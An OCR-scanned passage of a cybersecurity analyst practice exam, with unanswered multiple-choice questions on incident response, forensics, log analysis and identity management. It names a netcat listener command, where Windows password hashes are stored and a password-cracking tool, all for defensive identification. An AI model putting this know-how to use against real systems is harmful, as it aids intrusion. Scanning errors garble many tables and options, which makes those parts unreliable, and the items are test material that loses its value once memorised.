Jun 20 21:44:53 kali sudo: root : TTY=pts/0 ; PWD=/var/log ; USER=root ; COMMAND=/usr/sbin/useradd apache2 
Jun 20 21:44:53 kali sudo: pam _unix(sudo:session): session opened for user root by (uid=0) 

Jun 20 21:44:53 kali useradd[1449]: new group: name=apache2, GID=1001 

Jun 20 21:44:53 kali useradd[1449]: new user: name=apache2, UID=1001, GID=1001, home=/home/apache2, shell=/bin/sh 
Jun 20 21:44:53 kali sudo: pam_unix(sudo:session): session closed for user root 

Jun 20 21:45:01 kali CRON[1455]: pam_unix(cron:session): session opened for user root by (uid=0) 

Jun 20 21:45:01 kali CRON[1455]: pam_unix(cron:session): session closed for user root 

Jun 20 21:45:03 kali passwd[1454]: pam_unix(passwd:chauthtok): password changed for apache2 

Jun 20 21:45:03 kali passwd[1454]: gkr-pam: couldn't update the login keyring password: no old password was entered 
Jun 20 21:45:14 kali su[1458]: Successful su for apache2 by demo 

Jun 20 21:45:14 kali su[1458]: + /dev/pts/1 demo:apache2 

Jun 20 21:45:14 kali su[1458]: pam_unix(su:session): session opened for user apache2 by (uid=1000) 

Jun 20 21:45:14 kali_su[1458]: pam_systemd(su:session): Cannot create session: Already occupied by a session 


[https://drive.google.com/open?id=0B4u5n3PsqCBj TDViwHhycjhhSzQ |] 


A. A hacked root account 
B. A privilege escalation attack from a lower privileged account or service 


C. A malware infection 
D. A RAT 


A disgruntled former employee uses the systems she was responsible for to slow down the 
network that Chris is responsible for protecting during a critical business event. What 
NIST threat classification best fits this type of attack? 


A. Impersonation 
B. Attrition 

C. Improper usage 
D. Web 
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152. As part of his forensic analysis of a series of photos, John runs exiftool for each photo. 
He receives the following listing from one photo. What useful forensic information can he 
gather from this photo? 


153. 


File Name 

File Modification Date/Time 
File Access Date/Time 

File Creation Date/Time 


: IMG_20160307_145818. jpg 

: 2017:06:25 12:07:48-04:00 
: 2017:06:25 12:07:59-04:00 
: 2017:06:25 12:07:59-04:00 


File Type : JPEG 

File Type Extension : jpg 

MIME Type : image/jpeg 

Exif Byte Order : Big-endian (Motorola, MM) 
Modify Date : 2016:03:07 14:58:19 
GPS Date Stamp : 2016:03:07 

GPS Altitude Ref : Above Sea Level 

GPS Longitude Ref : West 

GPS Latitude Ref : North 

GPS Time Stamp : 3958277 

Camera Model Name : Nexus 6P 


Create Date 


: 2016:03:07 14:58:19 


F Number 2.0 

Focal Length 4.7 mm 
Aperture Value 2.0 
Exposure Mode Auto 

Sub Sec Time Digitized 013532 

Exif Image Height : 3024 

Focal Length In 35mm Format : © mm 

Scene Capture Type : Standard 
Scene Type : Unknown (@) 
Flash : Off, Did not fire 
Exif Version : 0220 

Make : Huawei 


GPS Altitude 
GPS Date/Time 
GPS Latitude 
GPS Longitude 
GPS Position 
Image Size 

Megapixels 


: 602 m Above Sea Level 

: 2016:03:07 19:58:172Z 

: 35 deg 36' 10.37" N 

: 82 deg 33° 53.05" W 

: 35 deg 36° 10.37" N, 82 deg 33° 53.05" W 
: 4032x3024 

: B23 


A. The original creation date, the device type, the GPS location, and the creator’s name 


wa 


The endian order of the file, the file type, the GPS location, and the scene type 


C. The original creation date, the device type, the GPS location, and the manufacturer of 
the device 


D. The MIME type, the GPS time, the GPS location, and the creator’s name 
During the preparation phase of his organization’s incident response process, Ben gath- 
ers a laptop with useful software including a sniffer and forensics tools, thumb drives and 


external hard drives, networking equipment, and a variety of cables. What is this type of 
pre-prepared equipment commonly called? 


A. A grab bag 

B. A jump kit 

C. Acrash cart 

D. A first responder kit 
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154. Chris is analyzing Chrome browsing information as part of a forensic investigation. After 
querying the visits table that Chrome stores, he discovers a 64-bit integer value stored as 
“visit time” listed with a value of 131355792940000000. What conversion does he need 


to perform on this data to make it useful? 

A. The value is in seconds since January 1, 1970. 

B. The value is in seconds since January 1, 1601. 

C. The value is a Microsoft timestamp and can be converted using the time utility. 

D. The value is an ISO 8601-formatted date and can be converted with any ISO time 
utility. 


155. Cynthia needs to ensure that the workstations she is responsible for have received a critical 


Windows patch. Which of the following methods should she avoid using to validate patch 
status for Windows 10 systems? 


A. Check the Update History manually. 
B. Runthe Microsoft Baseline Security Analyzer. 
C. Create and run a PowerShell script to search for the specific patch she needs to check. 


D. Use SCCM to validate patch status for each machine on her domain. 


156. As John proceeds with a forensic investigation involving numerous images, he finds a 
directory labeled Downloaded from Facebook. The images appear relevant to his investi- 
gation, so he processes them for metadata using exiftool. The following image shows the 
data provided. What forensically useful information can John gather from this output? 

File Name : 19399716 1496065780413664_ 1441550028730397635_n.jpg 
Directory Sx 
File Size : 70 kB 


File Modification Date/Time 
File Access Date/Time 
File Creation Date/Time 


: 2017:06:25 12:07:26-04:00 
: 2017:06:25 12:07:26-04:00 
: 2017:06:25 12:07:26-04:00 


File Permissions : PW-Pw-Pw- 
File Type : JPEG 

File Type Extension : jpg 

MIME Type : image/jpeg 
JFIF Version : 1.02 
Resolution Unit : None 

X Resolution + 4. 

Y Resolution S 


Current IPTC Digest 


Original Transmission Reference : 
: FBMDQ@1000a9c0d00006e2900006e500000F1520000cb550000126e0000c8a60000F4ac800003b200004ab70000eF170100 


Special Instructions 
Profile CMM Type 


: 2f6eccOd32eef36aad25edafFf530323e 


nP@wg6imjFN7U8R8DYa8 


: 2.0.0 


Profile Version 

Profile Class : Display Device Profile 
Color Space Data : RGB 

Profile Connection Space : XYZ 

Profile Date Time : 2009:03:27 21:36:31 
Profile File Signature : acsp 

Primary Platform : Unknown () 


CMM Flags 

Device Manufacturer 

Device Model 

Device Attributes 

Rendering Intent 

Connection Space Illuminant 
Profile Creator 

Profile ID 

Profile Description 

Blue Matrix Column 


: Not Embedded, Independent 


: Reflective, Glossy, Positive, Color 
: Perceptual 
: 0.9642 1 0.82491 


: 29f83ddeaff255ae7842fae4ca83390d 
: SRGB IEC61966-2-1 black scaled 
: 0.14307 0.06061 0.7141 


Blue Tone Reproduction Curve 
Device Model Desc 

Green Matrix Column 

Green Tone Reproduction Curve 
Luminance 


: (Binary data 2060 bytes, use -b option to extract) 
: IEC 61966-2-1 Default RGB Colour Space - sRGB 

: 0.38515 0.71687 0.09708 

: (Binary data 2060 bytes, use -b option to extract) 
: O 80 0 
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The original file creation date and time 
The device used to capture the image 


The original digest (hash) of the file, allowing comparison to the original 
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None; Facebook strips almost all useful metadata from images. 

The hospital that Ben works at is required to be HIPAA compliant and needs to protect 
HIPAA data. Which of the following is not an example of PHI? 

A. Names of individuals 

B. Records of health care provided 

C. Records of payment for healthcare 

D. Individual educational records 

Ben works at a U.S. federal agency that has experienced a data breach. Under FISMA, 
which organization does he have to report this incident to? 

A. US-CERT 

B. The National Cyber Security Authority 

C. The National Cyber Security Center 

D. CERT/CC 


Which of the following properly lists the order of volatility from least volatile to most 
volatile? 


A. Printouts, swap files, CPU cache, RAM 

B. Hard drives, USB media, DVDs, CD-RWs 
C. DVDs, hard drives, virtual memory, caches 
D. RAM, swap files, SSDs, printouts 


Joe wants to recovery the passwords for local Windows users on a Windows 7 worksta- 
tion. Where are the password hashes stored? 


A. C:\Windows\System32\passwords 

B. C:\Windows\System32\config 

C. C:\Windows\Secure\config 

D. C:\Windows\Secure\accounts 

While conducting a forensic review of a system involved in a data breach, Alex discovers a 
number of Microsoft Word files including files with filenames like critical_data.docx 


and sales_estimates_2017.docx. When he attempts to review the files using a text edi- 
tor for any useful information, he finds only unreadable data. What has occurred? 


A. Microsoft Word files are stored in .zip format. 

B. Microsoft Word files are encrypted. 

C. Microsoft Word files can be opened only by Microsoft Word. 
D 


The user has used antiforensic techniques to scramble the data. 


162. 


163. 


164. 


165. 
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Rick is attempting to diagnose high memory utilization issues on a macOS system and 
notices a chart showing memory pressure. What does memory pressure indicate for 
macOS when the graph is yellow and looks like the following image? 


MEMORY PRESSURE Physical Memory: 8.00 GB 
Memory Used: 7.15 GB App Memory: 2.25 GB 


h i 4 Wired Memory: 2.71 GB 
Cached Files: 794.0 MB Compressed: 219GB 
Swap Used: 2.19 GB 


A. Memory resources are available. 
B. Memory resources are available but being tasked by memory management processes. 


C. Memory resources are in danger, and applications will be terminated to free up 
memory. 


D. Memory resources are depleted, and the disk has begun to swap. 
Lucas believes that one of his users has attempted to use built-in Windows commands to 


probe servers on the network he is responsible for. How can he recover the command his- 
tory for that user if the system has been rebooted since the reconnaissance has occurred? 


A. Check the bash history. 

B. Open a command prompt window and hit F7. 

C. Manually open the command history from the user’s profile directory. 

D. The Windows command prompt does not store command history. 

While conducting a wireless site survey, Susan discovers two wireless access points that are 


both using the same MAC address. When she attempts to connect to each, she is sent to a 
login page for her organization. What should she be worried about? 


A. A misconfigured access point 
B. A vendor error 

C. An evil twin attack 

D. A malicious MAC attack 


During an incident response process, Alex discovers a running Unix process that shows 
that it was run using the command nc -k -l 6667. He does not recognize the service 
and needs assistance in determining what it is. Which of the following would best describe 
what he has encountered? 


A. AnIRCC server 

B. A network catalog server 

C. A user running a shell command 
D 


A netcat server 
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166. Angela is conducting an incident response exercise and needs to assess the economic 
impact to her organization of a $500,000 expense related to an information security inci- 
dent. How should she categorize this? 


A. 
B. 
C. 
D. 


Low impact 
Medium impact 
High impact 


Angela cannot assess the impact with the data given. 


167. Chris needs to verify that his Linux system is sending system logs to his SIEM. What method 
can he use to verify that the events he is generating are being sent and received properly? 


A. 
B. 
C. 
D. 


Monitor traffic by running Wireshark on the system. 
Configure a unique event ID and send it. 
Monitor traffic by running Wireshark on the SIEM device. 


Generate a known event and monitor for it. 


168. Susan wants to protect the Windows workstations in her domain from buffer overflow 
attacks. What should she recommend to the domain administrators at her company? 


A. 
B. 
C. 
D. 


Install an anti-malware tool. 

Install an antivirus tool. 

Enable DEP in Windows. 

Set VirtualAllocProtection to 1 in the registry. 


169. What step follows sanitization of media according to NIST guidelines for secure media 


handling? 

A. Reuse 

B. Validation 

C. Destruction 

D. Documentation 


170. Joe is responding to a ransomware incident that has encrypted financial and business data 
throughout the organization, including current payroll and HR data. As events currently 
stand, payroll cannot be run for the current pay period. If Joe uses the NIST functional 
impact categories shown here, how should Joe rate this incident? 


Category Definition 


None No effect to the organization’s ability to provide all services to all users. 

Low Minimal effect; the organization can still provide all critical services to all 
users but has lost efficiency. 

Medium Organization has lost the ability to provide a critical service to a subset of 
system users. 

High Organization is no longer able to provide some critical services to any users. 


Source: NIST SP 800-61 


171. 


172. 


173. 


174. 


175. 
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Critical 
Medium 
High 


Extended recovery 
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Lauren wants to create a documented chain of custody for the systems that she is handling 
as part of a forensic investigation. Which of the following will provide her with evidence 
that systems were not tampered with while she is not working with them? 


A. 
B. 
C. 
D. 


A chain of custody log 
Tamper-proof seals 
System logs 


None of the above 


Matt’s incident response team has collected log information and is working on identifying 
attackers using that information. What two stages of the NIST incident response process is 
his time working in? 


A. 
B. 
C. 
D. 


Preparation and containment, eradication, and recovery 
Preparation and post-incident activity 
Detection and analysis, and containment, eradication, and recovery 


Containment, eradication, and recovery and post-incident activity 


Angela wants to understand what a malware package does and executes it in a virtual 
machine that is instrumented using tools that will track what the program does, what 
changes it makes, and what network traffic it sends while allowing her to make changes 
on the system or to click files as needed. What type of analysis has Angela performed? 


A. 
B. 
C. 
D. 


Manual code reversing 
Interactive behavior analysis 
Static property analysis 


Dynamic code analysis 


Ben discovers that the forensic image he has attempted to create has failed. What is the 
most likely reason for this failure? 


A. 
B. 
C. 
D. 


Data was modified. 

The source disk is encrypted. 

The destination disk has bad sectors. 

The data cannot be copied in RAW format. 


Derek sets up a series of virtual machines that are automatically created in a completely 
isolated environment. Once created, the systems are used to run potentially malicious 
software and files. The actions taken by those files and programs are recorded and then 
reported. What technique is Derek using? 


A. 


B. 
C. 
D 


Sandboxing 
Reverse engineering 
Malware disassembly 


Darknet analysis 
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176. Chris notices the following entries in his Squert web console (a web console for Sguil IDS 
data). What should he do next to determine what occurred? 


10 1 1 22:42:49 [OSSEC] User missed the password more than one time 2502 
6 1 1 " 22:42:49 [OSSEC] SSHD authentication failed. 5716 
§ 2 1 22:42:37 [OSSEC] User login failed. 5503 
l 1 1 22:42:32 ET SCAN Potential SSH Scan 2001219 


Review ssh logs. 
Disable ssh and then investigate further. 
Disconnect the server from the Internet and then investigate. 


Immediately change his password. 


177. Lauren wants to avoid running a program installed by a user that she believes is set with 
a RunOnce key in the Windows registry but needs to boot the system. What can she do to 
prevent RunOnce from executing the programs listed in the registry key? 


A. 


© 


Disable the registry at boot. 
Boot into Safe Mode. 
Boot with the -RunOnce flag. 


RunOnce cannot be disabled; she will need to boot from external media to disable it 
first. 


178. Joseph wants to determine when a USB device was first plugged into a Windows worksta- 
tion. What file should he check for this information? 


A. 
B. 
C. 
D. 


The registry 

The setupapi log file 

The system log 

The data is not kept on a Windows system. 


179. A major new botnet infection that uses a peer-to-peer command-and-control process 
much like 2007’s Storm botnet has been released. Lauren wants to detect infected systems 
but knows that peer-to-peer communication is irregular and encrypted. If she wants to 
monitor her entire network for this type of traffic, what method should she use to catch 
infected systems? 


A. 


B. 
C. 
D. 


Build an IPS rule to detect all peer-to-peer communications that match the botnet’s 
installer signature. 


Use beaconing detection scripts focused on the command-and-control systems. 
Capture network flows for all hosts and use filters to remove normal traffic types. 


Immediately build a network traffic baseline and analyze it for anomalies. 


180. Which of the following activities is not part of the containment and restoration process? 


A. 
B. 


Minimizing loss 


Identifying the attacker 
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C. Limiting service disruption 


D. Rebuilding compromised systems 


181. Angela has recently taken a new position as the first security analyst that her employer has 
ever had on staff. During her first week, she discovers that there is no information security 
policy and that the IT staff do not know what to do during a security incident. Angela 
plans to stand up a CSIRT to handle incident response. What type of documentation 
should she provide to describe specific procedures that the CSIRT will use during events 
like malware infections and server compromise? 


A. 
B. 
C. 
D. 


An incident response policy 


An operations manual 


An incident response program 


A playbook 


182. What type of attack behavior is shown here? 





A. 
B. 
C 


D. 


Program 


Instructions 


Program Data 


Return 
Address 


Kernel override 
RPC rewrite 
Buffer overflow 
Heap hack 


Program 


Instructions 





Program Data 


Heap 
Malicious 
Code 


Modified 
Return 
Address 





Program 
Instructions 


Program Data 


Heap 
Malicious 
Code 


Modified 
Return 
Address 


183. While investigating a compromise, Jack discovers four files that he does not recognize and 
believes may be malware. What can he do to quickly and effectively check the files to see 
whether they are malware? 


A. 


B. 
C. 
D 


Submit them to a site like VirusTotal. 


Open them using a static analysis tool. 


Run strings against each file to identify common malware identifiers. 


Run a local antivirus or anti-malware tool against them. 
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Alex is attempting to determine why a Windows system keeps filling its disk. If she wants 
to see a graphical view of the contents of the disk that allows her to drill down on each 
cluster, what Sysinternals tool should she use? 


A. du 

B. df 

C. GraphDisk 
D. DiskView 


What useful information cannot be determined from the contents of the SHOME/.ssh 
folder when conducting forensic investigations of a Linux system? 


A. Remote hosts that have been connected to 

B. Private keys used to log in elsewhere 

C. Public keys used for logins to this system 

D. Passphrases associated with the keys 

John believes that the image files he has encountered during a forensic investigation were 


downloaded from a site on the Internet. What tool can John use to help identify where the 
files were downloaded from? 


A. Google reverse image search 
B. Tineye 

C. Bing Image Match 

D. All of the above 


Brian’s network suddenly stops working at 8:40 AM, interrupting video conferences, 
streaming, and other services throughout his organization, and then resumes functioning. 
When Brian logs into his PRTG console and checks his router’s traffic via the primary con- 
nection’s redundant network link, he sees the following graph. What should Brian presume 
occurred based on this information? 


Live Graph - 60 Minutes - 15 sec Interval 





08:20 08:30 08:40 08:50 09:00 09:10 


The network failed and is running in cached mode. 
There was a link card failure, and the card recovered. 


His primary link went down, and he should check his secondary link for traffic. 
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PRTG stopped receiving flow information and needs to be restarted. 
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188. Alex needs to create a forensic copy of a BitLocker-encrypted drive. Which of the follow- 
ing is not a method that he could use to acquire the BitLocker key? 


A. Analyzing the hibernation file 
B. Analyzing a memory dump file 
C. Retrieving the key from the MBR 
D. Performing a FireWire attack on mounted drives 
189. Adam works for a large university and sees the following graph in his PRTG console 


when looking at a year-long view. What behavioral analysis could he leverage based on 
this pattern? 


Daily Averages - 365 Days 


megabit/second 





2016-Aug 2016-Oct 2016-Dec 2017-Feb 2017-Apr 2017-Jun 


E Bandwidth Traffic IN == Bandwidth Traffic OUT 


Identify unexpected traffic during breaks like the low point at Christmas. 
He can determine why major traffic drops happen on weekends. 


He can identify top talkers. 
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Adam cannot make any behavioral determinations based on this chart. 
190. What is space between the last sector containing logical data and the end of the cluster 
called? 
A. Unallocated space 
B. Ephemeral space 
C. Slack space 
D. Unformatted space 
191. Frank wants to use netstat to get the process name, the PID, and the username associ- 


ated with processes that are running on a Linux system he is investigating. What netstat 
flags will provide him with this information? 


A. -na 
B. -pt 
C. -pe 
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Jack is preparing to take a currently running PC back to his forensic lab for analysis. As 
Jack considers his forensic process, one of his peers recommends that he simply pull the 
power cable rather than doing a software-based shutdown. Why might Jack choose to 
follow this advice? 


A. It will create a crash log, providing useful memory forensic information. 

B. It will prevent shutdown scripts from running. 

C. It will create a memory dump, providing useful forensic information. 

D. It will cause memory-resident malware to be captured, allowing analysis. 

Amanda has been tasked with acquiring data from an iPhone as part of a mobile forensics 


effort. At this point, should she remove the SIM (or UICC) card from the device if she 
receives the device in a powered-on state? 


A. While powered on, but after logical collection 

B. While powered on, prior to logical collection 

C. While powered off, after logical collection 

D. While powered off, before logical collection 

Rick wants to validate his recovery efforts and intends to scan a web server he is respon- 


sible for with a scanning tool. What tool should he use to get the most useful information 
about system vulnerabilities? 


A. Wapiti 

B. Nmap 

C. OpenVAS 
D. ZAP 


What is the key goal of the containment stage of an incident response process? 

A. To limit leaks to the press or customers 

B. To limit further damage from occurring 

C. To prevent data exfiltration 

D. To restore systems to normal operation 

What level of forensic data extraction will most likely be possible and reasonable for a cor- 
porate forensic examiner who deals with modern phones that provide filesystem encryption? 
A. Level 1: Manual extraction 

B. Level 2: Logical extraction 

C. Level 3: JTAG or HEX dumping 

D. Level 4: Chip extraction 

Angela is performing a forensic analysis of a Windows 10 system and wants to provide 


an overview of usage of the system using information contained in the Windows registry. 
Which of the following is not a data element she can pull from the SAM? 


A. Password expiration setting 


B. User account type 
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C. Number of logins 
D. The first time the account logged in 
198. Samantha is preparing a report describing the common attack models used by advanced 
persistent threat actors. Which of the following is a typical characteristic of APT attacks? 
A. They involve sophisticated DDoS attacks. 
B. They quietly gather information from compromised systems. 
C. They rely on worms to spread. 
D. They use encryption to hold data hostage. 
199. During an incident response process, Alice is assigned to gather details about what data 


was accessed, if it was exfiltrated, and what type of data was exposed. What type of anal- 
ysis is she doing? 


A. Information impact analysis 
B. Economic impact analysis 
C. Downtime analysis 

D. Recovery time analysis 


200. Angela has discovered an attack that appears to be following the process flow shown here. 
What type of attack should she identify this as? 


Identify 
Target 


Conceal 

Evidence Prepare for 
and Retain Attack 

Access 


Exfiltrate 
Data 


Expand 
Access 
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A. Phishing 

B. Zero-day exploit 

C. Whaling 

D. Advanced persistent threat 


Refer to the image shown here for questions 201 to 203. 
ja 
= 


High Volume High Relevance 













Preservation 


Production Presentation 





Identification 


Collection 





201. 


202. 


203. 


During an e-discovery process, Angela reviews the request from opposing counsel and 
builds a list of all of the individuals identified. She then contacts the IT staff who support 
each person to request a list of their IT assets. What phase of the EDRM flow is she in? 


A. Information governance 

B. Identification 

C. Preservation 

D. Collection 

During the preservation phase of her work, Angela discovers that information requested as 


part of the discovery request has been deleted as part of a regularly scheduled data cleanup 
as required by her organization’s policies. What should Angela do? 


A. Conduct a forensic recovery of the data. 
B. Create synthetic data to replace the missing data. 
C. Report the issue to counsel. 


D. Purge any other data related to the request based on the same policy. 


What phase should Angela expect to spend the most person-hours in? 
A. Identification 

B. Collection and preservation 

C. Processing, review, and analysis 
D 


Production 


204. 


205. 


206. 
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The incident response kit that Cassandra is building is based around a powerful laptop 
so that she can perform on-site drive acquisitions and analysis. If she expects to need to 
acquire data from both SATA and IDE drives, what item should she include in her kit? 


A. A write blocker 

B. A USB hard drive 

C. A multi-interface drive adapter 
D. A USB-C cable 


Which of the following items is not typically found in corporate forensic kits? 

A. Write blockers 

B. Crime scene tape 

C. Label makers 

D. Decryption tools 

What incident response tool should Lauren build prior to an incident to ensure that staff 
can reach critical responders when needed? 

A. A triage triangle 

B. Acall list 

C. Acall rotation 

D. A responsibility matrix 

While performing process analysis on a compromised Linux system, Kathleen discovers a 


process called “john” that is running. What should she identify as the most likely use of 
the program? 


A. Password cracking 

B. Privilege escalation 

C. A rootkit 

D. A user named John’s personal application 

Which of the following organizations is not typically involved in post-incident communi- 
cations? 

A. Developers 

B. Marketing 

C. Public relations 

D. Legal 

While reviewing system logs, Charles discovers that the processor for the workstation he 
is reviewing has consistently hit 100% processor utilization by the web browser. After 


reviewing the rest of the system, no unauthorized software appears to have been installed. 
What should Charles do next? 


A. Review the sites visited by the web browser when the CPU utilization issues occur 
B. Check the browser binary against a known good version 

C. Reinstall the browser 

D. Disable TLS 
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Lauren finds that the version of Java installed on her organization’s web server has been 
replaced. What type of issue is this best categorized as? 


A. Unauthorized software 

B. An unauthorized change 

C. Unexpected input 

D. A memory overflow 

Greg finds a series of log entries in his Apache logs showing long strings 


“AAAAAAAAAAAAAAAAAAAAAAA?” followed by strings of characters. What type of 
attack has he most likely discovered? 


A. A SQL injection attack 

B. A denial of service attack 

C. A memory overflow attack 

D. A PHP string-ring attack 

Catherine wants to detect unexpected output from the application she is responsible for 


managing and monitoring. What type of tool can she use to detect unexpected output 
effectively? 


A. A log analysis tool 

B. A behavior based analysis tool 
C. A signature based detection tool 
D 


Manual analysis 
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Architecture and 
Tool Sets 





EXAM OBJECTIVES COVERED IN THIS 
CHAPTER: 


Y/Y 4.1 Explain the relationship between frameworks, 
common policies, controls, and procedures. 


=» Regulatory compliance 
=» Frameworks 

= Policies 

=» Controls 

=» Procedures 


= Verifications and quality control 


/ 4.2 Given a scenario, use data to recommend 
remediation of security issues related to identity and 
access management. 


=» Security issues associated with context-based authentication 
=» Security issues associated with identities 

=» Security issues associated with identity repositories 

=» Security issues associated with federation and single sign-on 


a Exploits 


Y/Y 4.3 Given a scenario, review security architecture 
and make recommendations to implement compensating 
controls. 


=» Security data analytics 
=» Manual review 


= Defense in depth 


Y/Y 4.4 Given a scenario, use application security best 
practices while participating in the Software 
Development Life Cycle (SDLC). 


=» Best practices during software development 


=» Secure coding best practices 


V 4.5 Compare and contrast the general purpose and 
reasons for using various cybersecurity tools and 
technologies. 


=» Preventative 


a Collective 





=» Analytical 
a Exploit 


=» Forensics 
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1. Jim is helping a software development team integrate security reviews into their code 
review process. He would like to implement a real-time review technique. Which one of 
the following approaches would best meet his requirements? 


A. 
B. 
C. 
D. 


Pair programming 
Pass-around code review 
Tool-assisted review 


Formal code review 


Sonia is investigating a server on her network that is behaving suspiciously. She used 


Process Explorer from the Sysinternals toolkit and found the results shown here. What 
service on this system is responsible for the most memory usage? 


O Process Explorer - Sysinternals: www.sysinternals.com [EC2AMAZ-82IMI3E\Administrator] 


File Options View Process Find Users Help 


CPU Private Bytes MaRS 
Susp... 59,164 K 62,540 K 
8.212 K 16,912 K 
2.240 K 13,000 K 
2,224 K 10,296 K 
4,132 K 11,252 K 
7,360 K 13,356 K 
120,372 K 122,724 K 
2.820 K 15,776 K 
1,412 K 
14,216 K 


PID Description 
3052 WMI Provider Host 


3240 KMS Connection Broker 
4180 WMI Provider Host 
904 Host Process for Windows S... 
508 Host Process for Windows S... 
2964 RDP Clipboard Monitor 
5716 RDP Session Input Handler 


1116 Host Process for Windows S... Microsoft Corporation 
1144 Host Process for Windows S... Microsoft Corporation 
484 Shell Infrastructure Host Microsoft Corporation 
72 Host Process for Windows T... i 
5200 Host Process for Windows T... 
1152 Host Process for Windows S... 
1328 Host Process for Windows S... 
1340 Host Process for Windows S... 
1904 Spooler SubSystem App Corporation 
2000 XenSource Windows guest ... Windows (R) Win 7 DDKp... 
2028 
1248 Host Process for Windows S... Microsoft Corporation 
1376 SQL Server VSS Writer - 64 Bit Microsoft Corporation 
1564 Host Process for Windows S... Microsoft Corporation 


5116 Host Process for Windows S... 
5240 Adobe Acrobat Update Servi... 
1956 Google Installer 

4072 Microsoft Windows Search |... 
5264 Microsoft Windows Search P... 
5356 Microsoft Windows Search F... 
632 Client Server Runtime Process 
684 Windows Logon Application 
556 Client Server Runtime Process 
3420 Windows Logon Application 
2040 Desktop Window Manager 


. 5556 SQL Server Management St... Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Sysintemals - www.sysinter... 
Box, Inc. 


101,112 K 
18,548 K 
1,300 K 
1,096 K 
180,084 K 
560 K 
5.224 K 
1,784 K 
5,340 K 





Microsoft Corporation 
Microsoft Corporation 


v 


PU Usage: 2.86% Commit Charge: 68.98% Processes: 79 Physical Usage: 86.27% J 
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Internet Explorer 


Process Explorer 
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Database server 
D. Web server 


3. Jean is deploying a new application that will process sensitive health information about 
her organization’s clients. To protect this information, the organization is building a new 
network that does not share any hardware or logical access credentials with the organiza- 
tion’s existing network. What approach is Jean adopting? 


A. Network interconnection 

B. Network segmentation 

C. Virtual LAN (VLAN) isolation 
D. Virtual private network (VPN) 


4. Norm is troubleshooting connectivity between a security device on his network and a 
remote SIEM service that is not receiving logs from the device. He runs several diagnostic 
commands from the security device and captures the network traffic while he is running 
those diagnostics. The following image shows the result of capturing some of that traffic 
with Wireshark. What does the currently inspected packet indicate? 


eee i Capturing from Wi-Fi: end 


Meade ofikio Wes ee] Baaat 





Time Source Destination Protocol Length Info 
1 0.000000 10.36.19.226 151.101.185.67 ICMP 98 Echo (ping) request id=@xfba8, seq=7/1792, ttl=64 (reply in 2) 
2 0.022029 151.101.185. 67 10.36.19.226 ICMP 98 Echo (ping) reply id=@xfba8, seq=7/1792, ttl=55 (request in 1) 
0.213694 74.125.129.189 10.36.19.226 QUIC 976 Payload (Encrypted), PKN: 55815 
0.242770 10. 36.19.226 74.125.129.189 QUIC 78 Payload (Encrypted), PKN: 19, CID: 7257069669639549826 
0.868880 74.125.129.189 10.36.19.226 QUIC 84 Payload (Encrypted), PKN: 56071 
0.868885 74.125.129.189 190.36.19.226 QUIC 62 Payload (Encrypted), PKN: 56327 
0.868931 74.125.129.157 10.36.19.226 TLSv1... 129 Application Data 








0.869040 10. 36.19.226 74.125.129.157 53636 + 443 [ACK] Seq=1 Ack=64 Win=4095 Len=0 TSval=414745221 TSecr=1221219215 
0.869041 10. 36.19.226 74.125.129.157 53636 ~ 443 [ACK] Seq=1 Ack=65 Win=4095 Len=0 TSval=414745221 TSecr=1221219215 
0.869221 74.125.129.189 100.36.19.226 Payload (Encrypted), PKN: 56583 

0.869236 10. 36.19.226 74.125.129.189 Payload (Encrypted), PKN: 20, CID: 7257069669639549826 


0.877817 10. 36.19.226 74.125.129.189 Payload (Encrypted), PKN: 21, CID: 7257069669639549826 
0.891230 74.125.129.157 10. 36.19.226 443 = 53636 [ACK] Seq=65 Ack=2 Win=175 Len=0 TSval=1221219256 TSecr=414745222 
0.904457 74.125.129.189 10.36.19.226 279 Payload (Encrypted), PKN: 56839 


ncrypted PKN: OY 


2 4 9 D. 36 6 Ol 3 3 3 
Frame 2: 98 bytes on wire (784 bits), 98 bytes captured (784 bits) on interface @ 
Ethernet II, Src: Cisco_8f:ec:00 (00:1f:c9:8f:ec:00), Dst: Apple_87:8a:73 (98:e0:d9:87:8a:73) 
Internet Protocol Version 4, Src: 151.101.185.67, Dst: 10.36.19.226 
Internet Control Message Protocol 

Type: © (Echo (ping) reply) 

Code: @ 

Checksum: @xe974 [correct] 

[Checksum Status: Good] 

Identifier (BE): 64424 (@xfba8) 

Identifier (LE): 43259 (@xa8fb) 

Sequence number (BE): 7 (@x0007) 

Sequence number (LE): 1792 (@x0700) 

[Request frame: 1] 

[Response time: 22.029 ms] 

Timestamp from icmp data: Sep 27, 2017 08:46:13.342130000 EDT 

[Timestamp from icmp data (relative): @.02212300@ seconds] 

Data (48 bytes) 

Data: 08090a0b0c0d0e0f101112131415161718191lalbicidielf... 
[Length: 48] 


0446 


s... Sss ssssssE, 
Tasse. )t.e.C.$ 
seenetes 2eVouues 


&' ()*+,- ./012345 
67 





A. The remote server is reachable over the network. 


B. The remote server is not connected to the Internet. 
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C. Norm’s device is not connected to the Internet. 
D. Norm does not have enough information to draw one of the conclusions listed here. 
Roberta is designing a password policy for her organization and wants to include a control 


that will limit the length of exposure of an account with a compromised password. Which 
one of the following controls would best meet Roberta’s goal? 


A. Minimum password length 

B. Password history 

C. Password expiration 

D. Password complexity 

. Angela wants to implement multifactor authentication for her organization and has been 


offered a number of choices. Which of the following choices is not an example of multifac- 
tor authentication? 


A. Password and retina scan 

B. PIN and SMS token 

C. Password and security questions 
D. Password and SMS token 


Roland received a security assessment report from a third-party assessor, and it indicated 
that one of the organization’s web applications is susceptible to an OAuth redirect attack. 
What type of attack would this vulnerability allow an attacker to wage? 


A. Privilege escalation 
B. Cross-site scripting 
C. SQL injection 


D. Impersonation 


. Which role ina SAML authentication flow validates the identity of the user? 
A. The SP 


B. The IDP 
C. The principal 
D. The RP 


Daniel is hiring a third-party consultant who will have remote access to the organization’s 
data center, but he would like to approve that access each time it occurs. Which one of the 
following solutions would meet Daniel’s needs in a practical manner? 


A. Daniel should keep the consultant’s password himself and provide it to the consultant 
when needed and then immediately change the password after each use. 


B. Daniel should provide the consultant with the password but configure his own device 
to approve logins via multifactor authentication. 


C. Daniel should provide the consultant with the password but advise the consultant that 
she must advise him before using the account and then audit those attempts against 
access logs. 


D. Daniel should create a new account for the consultant each time she needs to access 
the data center. 
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10. Bryan is selecting a firewall to protect his organization’s internal infrastructure from net- 
work-based attacks. Which one of the following products is not suitable to meet this need? 


A. Cisco NGFW 
B. HP TippingPoint 
C. CheckPoint appliance 
D. Palo Alto NGFW 
11. Allan is building a database server that will provide analytics support to a data science 


team within his organization. The current layout of his organization’s network is shown 
here. Which network zone would be the most appropriate location for this server? 


Firewall 
Border Router a 










